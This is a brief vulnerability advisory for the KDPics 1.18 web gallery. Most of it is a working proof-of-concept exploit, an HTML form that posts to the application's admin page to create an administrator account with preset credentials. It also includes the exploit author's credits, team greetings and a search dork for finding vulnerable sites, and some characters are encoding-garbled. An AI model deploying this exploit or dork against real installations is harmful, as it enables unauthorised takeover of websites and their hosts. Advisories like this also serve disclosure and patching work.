source: https://www.securityfocus.com/bid/38603/info
KDPics is prone to a vulnerability that lets an attacker add an administrative user because it fails to adequately secure access to administrative functionality.
This may allow the attacker to compromise the application and the computer; other attacks are also possible.
KDPics 1.18is vulnerable; other versions may also be affected.<html><title>G�n�r� par KDPics v1.18 Remote Add Admin</title><body link="#00FF00" text="#008000" bgcolor="#000000"><form method="POST" action="http://www.example.com/kdpics/admin/index.php3?page=options&categorie="><inputtype="hidden" name="type" value="add"><table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080"><tr><td class="top"><p align="center"><b>User & Pass :Snakespc</b></p><p align="center"><b><font face="Comic Sans MS"><a href="http://www.example.com//index.php?act=idx" style="text-decoration: none"><font color="#00FF00">[�]Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc>]</p>[�] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]</p>[�] Dork:"G�n�r� par KDPics v1.18"</font></a></font></b></p><p align="center"><b>Username:</b></td></tr><tr><td height="1"><p align="center"><inputtype="text" name="adminuser" size="30" value="Snakespc"></td></tr><tr><td class="top"><p align="center"><b>Password:</b></td></tr><tr><td height="22"><p align="center"><inputtype="password" name="adminpass" size="30" value="Snakespc"></td></tr><tr><td align="right"><p align="center"><inputtype="submit" value="Add User >>" style="font-weight: 700"></td></tr></form></table></html>
